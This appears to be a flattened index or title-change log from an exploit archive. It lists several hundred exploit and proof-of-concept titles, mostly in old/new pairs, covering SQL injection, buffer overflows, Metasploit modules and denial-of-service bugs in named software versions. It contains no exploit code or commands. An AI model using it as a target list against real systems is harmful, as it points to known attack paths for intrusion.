SQL Injection / Authenticated Code Execution Online Guestbook Pro - (display) Blind SQL Injection Esoftpro Online Guestbook Pro - (display) Blind SQL Injection tematres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ZaoCMS - (user_id) SQL Injection ZaoCMS - 'user_id' SQL Injection Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC) Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC) ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection WebBoard 2.90 Beta - Remote File Disclosure 212Cafe WebBoard 2.90 Beta - Remote File Disclosure ZeusCart 2.3 - (maincatid) SQL Injection ZeusCart 2.3 - 'maincatid' SQL Injection DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC) Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC) OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs Microsoft Office Web Components (Spreadsheet) - ActiveX Buffer Overflow (PoC) Microsoft Office Web Components (OWC) Spreadsheet - ActiveX Buffer Overflow (PoC) DD-WRT - (httpd service) Remote Command Execution DD-WRT HTTPd Daemon/Service - Remote Command Execution GLinks 2.1 - (cat) Blind SQL Injection Groone's GLink ORGanizer 2.1 - (cat) Blind SQL Injection XOOPS celepar module qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Amaya 11.2 W3C Editor/Browser - (defer) Remote Buffer Overflow (SEH) Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH) Payment Processor Script - 'shop.htm cid' SQL Injection Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC) Apple Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC) BandCMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - news.php Multiple SQL Injection Microsoft IIS 5.0 (Windows 2000 SP4) - FTP Server Remote Stack Overflow Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Eureka Mail Client 2.2q - PoC Buffer Overflow Eureka Email Client 2.2q - PoC Buffer Overflow Solaris 8.0 - LPD Command Execution (Metasploit) Solaris 8.0 LPD - Command Execution (Metasploit) Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit) Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit) Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit) Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit) ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit) NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit) Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow BulletProof FTP Client 2.63 b56 - Malformed '.bps' File Stack Buffer Overflow Dopewars 1.5.12 Server - Denial of Service Dopewars Server 1.5.12 - Denial of Service Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution Adobe Shockwave Player 11.5.1.601 - Multiple Code Execution HP Power Manager Administration - Universal Buffer Overflow Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service HP Openview NNM 7.53 - Invalid DB Error Code HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code Quick.Cart 3.4 and Quick.CMS 2.4 - Cross-Site Request Forgery Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery Eureka Mail Client - Remote Buffer Overflow Eureka Email Client - Remote Buffer Overflow IDEAL Administration 2009 9.7 - Local Buffer Overflow PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow phpshop 0.8.1 - Multiple Vulnerabilities phpShop 0.8.1 - Multiple Vulnerabilities IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit) PointDev IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit) HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow DigitalHive - Multiple Vulnerabilities Digital Hive - Multiple Vulnerabilities zabbix server - Multiple Vulnerabilities Zabbix Server - Multiple Vulnerabilities freekot - (Authentication Bypass) SQL Injection Digiappz Freekot - (Authentication Bypass) SQL Injection TFTP Daemon 1.9 - Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service B2B Trading Marketplace - SQL Injection SoftBiz B2B trading Marketplace Script - SQL Injection Mini-stream - Windows XP SP2 and SP3 Exploit Mini-stream Ripper (Windows XP SP2/SP3) - Exploit Audiotran 1.4.1 - (Win XP SP2/SP3 English) Buffer Overflow Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service iTunes 9.0.1 - '.pls' Handling Buffer Overflow Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow Apple Safari 4.0.4 & Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service/PoC Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC) Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service bild flirt system 2.0 - 'index.php' 'id' SQL Injection Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection SAFARI APPLE 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash) Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash) iOS Safari - Bad 'VML' Remote Denial of Service iOS Safari - Remote Denial of Service Apple iOS Safari - Bad 'VML' Remote Denial of Service Apple iOS Safari - Remote Denial of Service HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow Adobe Reader - Escape From PDF Adobe Reader - Escape From '.PDF' TugZip 3.5 - '.ZIP' File Buffer Overflow TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow Joomla! Component jp_jobs - SQL Injection Joomla! Component com_jp_jobs - SQL Injection Joomla! Component QPersonel - SQL Injection Joomla! Component com_QPersonel - SQL Injection Bild Flirt 1.0 - SQL Injection Bild Flirt System 1.0 - SQL Injection Safari 4.0.5 - (531.22.7) Denial of Service Apple Safari 4.0.5 - (531.22.7) Denial of Service Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service Safari 4.0.3 / 4.0.4 - Stack Exhaustion Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion 724CMS Enterprise 4.59 - SQL Injection PHPKB Knowledge Base Software 2.0 - Multilanguage Support - Multiple SQL Injections 724CMS 4.59 Enterprise - SQL Injection PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections Joomla! Component JE Job - Local File Inclusion Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Joomla! Component com_jejob 1.0 - 'catid' SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Savy Soda Documents - (Mobile Office Suite) XLS Denial of Service Office^2 iPhone - XLS Denial of Service GoodiWare GoodReader iPhone - XLS Denial of Service Savy Soda Documents - (Mobile Office Suite) '.XLS' Denial of Service Office^2 iPhone - '.XLS' Denial of Service GoodiWare GoodReader iPhone - '.XLS' Denial of Service Yamamah (news) - SQL Injection / Source Code Disclosure Yamamah - 'news' SQL Injection / Source Code Disclosure Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan k-search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities YPNinc JokeScript - (ypncat_id) SQL Injection YPNinc JokeScript - 'ypncat_id' SQL Injection YPNinc PHP Realty Script - (docID) SQL Injection YPNinc PHP Realty Script - 'docID' SQL Injection HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution Apple Mac OSX (Snow Leopard) EvoCam Web Server - ROP Remote Exploit Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) Safari Browser 4.0.2 - Clickjacking Apple Safari 4.0.2 - Clickjacking Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (Internet Explorer 6/7' Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7) Apple iOS - pdf Jailbreak Exploit Apple iOS - '.pdf' Jailbreak Exploit HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution AdaptCMS 2.0.1 Beta Release - Remote File Inclusion (Metasploit) AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit) DATAC RealWin 2.0 (Build 6.1.8.10) - Buffer Overflow DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow FatPlayer 0.6b - '.wav' Buffer Overflow (SEH) Fat Player 0.6b - '.wav' Buffer Overflow (SEH) CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1 - SQL Injection DATAC RealWin SCADA 1.06 - Buffer Overflow DATAC RealWin SCADA Server 1.06 - Buffer Overflow pilot cart 7.3 - Multiple Vulnerabilities ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities Mp3-Nator 2.0 - Buffer Overflow (SEH) MP3-Nator 2.0 - Buffer Overflow (SEH) Safari 5.02 - Stack Overflow Denial of Service Apple Safari 5.02 - Stack Overflow Denial of Service Microsoft Windows Task Scheduler - Privilege Escalation Microsoft Windows - Task Scheduler Privilege Escalation Pandora Fms 3.1 - Authentication Bypass Pandora FMS 3.1 - Authentication Bypass bugtracker.net 3.4.4 - Multiple Vulnerabilities BugTracker.NET 3.4.4 - Multiple Vulnerabilities Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow WMITools ActiveX - Remote Command Execution Microsoft WMITools ActiveX - Remote Command Execution VideoSpirit Pro 1.68 - Local Buffer Overflow VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow Apple Mac OSX iTunes 8.1.1 - ITms Overflow (Metasploit) Apple iTunes 8.1.1 (Mac OSX) - ITms Overflow (Metasploit) PeaZip 2.6.1 - Zip Processing Command Injection (Metasploit) PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit) Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit) Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit) Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit) Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit) Solaris sadmind - Command Execution (Metasploit) Solaris Sadmind - Command Execution (Metasploit) Sun Solaris - Telnet Remote Authentication Bypass (Metasploit) Sun Solaris Telnet - Remote Authentication Bypass (Metasploit) Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit) Oracle 8i TNS Listener - 'ARGUMENTS' Buffer Overflow (Metasploit) Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit) Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit) TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit) 3CTftpSvc TFTP - Long Mode Buffer Overflow (Metasploit) Quick FTP Pro 2.1 - Transfer-Mode Overflow (Metasploit) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit) Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit) Allied Telesyn TFTP Server 1.9 - Long Filename Overflow (Metasploit) Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit) CA BrightStor - ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit) CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit) Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (2) Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2) FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) Kerio Firewall 2.1.4 - Authentication Packet Overflow (Metasploit) Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit) Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit) Mercury/32 <= 4.01b - LOGIN Buffer Overflow (Metasploit) Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit) MailEnable IMAPD (2.35) - Login Request Buffer Overflow (Metasploit) Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit) Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit) Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit) MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit) Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) IMail IMAP4D - Delete Overflow (Metasploit) IPSwitch IMail IMAP4D - Delete Overflow (Metasploit) Mercury/32 4.01a - IMAP RENAME Buffer Overflow (Metasploit) Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit) Ipswitch IMail - IMAP SEARCH Buffer Overflow (Metasploit) Ipswitch IMail Server - IMAP SEARCH Buffer Overflow (Metasploit) AOL Instant Messenger - goaway Overflow (Metasploit) AOL Instant Messenger AIM - goaway Overflow (Metasploit) Microsoft OWC Spreadsheet - msDataSourceObject Memory Corruption (Metasploit) Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit) Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit) Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit) Tumbleweed FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit) Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit) RKD Software 'BarCodeAx.dll' 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit) RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit) RealNetworks RealPlayer - SMIL Buffer Overflow (Metasploit) RealNetworks RealPlayer - '.SMIL' Buffer Overflow (Metasploit) Adobe Shockwave - rcsL Memory Corruption (Metasploit) Adobe Shockwave Player - rcsL Memory Corruption (Metasploit) Microsoft Internet Explorer - VML Fill Method Code Execution (Metasploit) Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit) WebEx UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit) Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit) ACDSee - XPM File Section Buffer Overflow (Metasploit) ACDSee - '.XPM' File Section Buffer Overflow (Metasploit) HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow (Metasploit) HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit) Orbital Viewer - ORB File Parsing Buffer Overflow (Metasploit) Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit) Audio Workstation 6.4.2.4.3 - pls Buffer Overflow (Metasploit) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) Qbik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit) QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit) Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) Cesar FTP 0.99g - (MKD) Command Buffer Overflow (Metasploit) CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit) Serv-U FTPD - MDTM Overflow (Metasploit) RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP - 'Username' Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit) FileCopa FTP Server pre 18 Jul Version - Exploit (Metasploit) FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit) SentinelLM - UDP Buffer Overflow (Metasploit) Sentinel LM - UDP Buffer Overflow (Metasploit) Apache module Mod_Rewrite - LDAP protocol Buffer Overflow (Metasploit) Xitami 2.5c2 Web Server - If-Modified-Since Overflow (Metasploit) Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit) Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit) Sambar 6 - Search Results Buffer Overflow (Metasploit) Sambar Server 6 - Search Results Buffer Overflow (Metasploit) IA WebMail 3.x - Buffer Overflow (Metasploit) IA WebMail Server 3.x - Buffer Overflow (Metasploit) Savant 3.1 Web Server - Overflow Exploit (Metasploit) Savant Web Server 3.1 - Overflow Exploit (Metasploit) HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) Hewlett-Packard Power Manager Administration - Buffer Overflow (Metasploit) Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit) Ipswitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit) IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit) PSO Proxy 0.91 - Stack Buffer Overflow (Metasploit) PSOProxy 0.91 - Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow (Metasploit) Apache mod_jk 1.2.20 - Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit) Apache Tomcat mod_jk 1.2.20 - Buffer Overflow (Metasploit) NaviCOPA 2.0.1 - URL Handling Buffer Overflow (Metasploit) NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit) MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit) Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit) YPOPS 0.6 - Buffer Overflow (Metasploit) YahooPOPs (YPOPS) 0.6 - Buffer Overflow (Metasploit) Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow (Metasploit) Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit) IMail LDAP Service - Buffer Overflow (Metasploit) IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit) GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) Poptop - Negative Read Overflow (Metasploit) UoW IMAP server - LSUB Buffer Overflow (Metasploit) PoPToP - Negative Read Overflow (Metasploit) UoW IMAPd Server - LSUB Buffer Overflow (Metasploit) DD-WRT HTTP Daemon - Arbitrary Command Execution (Metasploit) DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit) Samba (Linux/x86) - trans2open Overflow (Metasploit) iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1) AppleFileServer - LoginExt PathName Overflow (Metasploit) Samba (Linux x86) - trans2open Overflow (Metasploit) Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1) AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit) Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit) Safari - Archive Metadata Command Execution (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit) Apple Safari - Archive Metadata Command Execution (Metasploit) iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2) Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2) Mail.app - Image Attachment Command Execution (Metasploit) Apple Mail.app - Image Attachment Command Execution (Metasploit) Apple Mac OSX QuickTime - RTSP Content-Type Overflow (Metasploit) Apple Mac OSX EvoCam - HTTP GET Buffer Overflow (Metasploit) Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit) Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit) Samba trans2open (*BSD/x86) - Overflow Exploit (Metasploit) Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit) PHP XML-RPC - Arbitrary Code Execution (Metasploit) XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit) AWStats 6.4 < 6.5 migrate - Remote Command Execution (Metasploit) HP Openview - connectedNodes.ovpl Remote Command Execution (Metasploit) AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit) HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit) TWiki Search Function - Arbitrary Command Execution (Metasploit) TWiki - Search Function Arbitrary Command Execution (Metasploit) Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit) The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit) Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow (Metasploit) Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit) Kolibri 2.0 - HTTP Server HEAD Buffer Overflow (Metasploit) Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit) 7-Technologies igss 9.00.00.11059 - Multiple Vulnerabilities 7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities HP OpenView NNM - nnmRptConfig nameParams Buffer Overflow (Metasploit) HP NNM - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP NNM - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP OpenView NNM - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit) VeryTools VideoSpirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit) eyeos 1.9.0.2 - Persistent Cross-Site Scripting using image files eyeos 1.9.0.2 - Persistent Cross-Site Scripting Using Image Files Golden FTP 4.70 - PASS Stack Buffer Overflow (Metasploit) Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit) manageengine support center plus 7.8 build 7801 - Directory Traversal ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal Safari 5.0.6/5.1 - SVG DOM Processing (PoC) Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC) Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass) Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass) TugZip 3.5 - '.ZIP' File Parsing Buffer Overflow (Metasploit) TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit) Sports PHool 1.0 - Remote File Inclusion SportsPHool 1.0 - Remote File Inclusion Mini-stream 3.0.1.1 - Buffer Overflow (3) Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3) Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution Log1 CMS 2.0 - (ajax_create_folder.php) Remote Code Execution Zabbix 1.8.4 - (popup.php) SQL Injection Zabbix 1.8.4 - 'popup.php' SQL Injection CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow SEH Exploit (Metasploit) Serv-U FTP Server < 4.2 - Buffer Overflow (Metasploit) RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit) Family Connections - less.php Remote Command Execution (Metasploit) Family Connections CMS - 'less.php' Remote Command Execution (Metasploit) FCMS 2.7.2 CMS - Multiple Persistent Cross-Site Scripting Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting openemr 4 - Multiple Vulnerabilities Safari - GdiDrawStream BSoD OpenEMR 4 - Multiple Vulnerabilities Apple Safari - GdiDrawStream BSoD clip bucket 2.6 - Multiple Vulnerabilities Clipbucket 2.6 - Multiple Vulnerabilities Tube Ace(Adult PHP Tube Script) - SQL Injection Tube Ace (Adult PHP Tube Script) - SQL Injection Dolibarr CMS 3.2.0 < Alpha - File Inclusion Dolibarr 3.2.0 < Alpha - File Inclusion PBLang - Local File Inclusion PBLang Bulletin Board System - Local File Inclusion NetDecision 4.5.1 - HTTP Server Buffer Overflow (Metasploit) Netmechanica NetDecision HTTP Server 4.5.1 - Buffer Overflow (Metasploit) Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow Ricoh DC Software DL-10 SR10 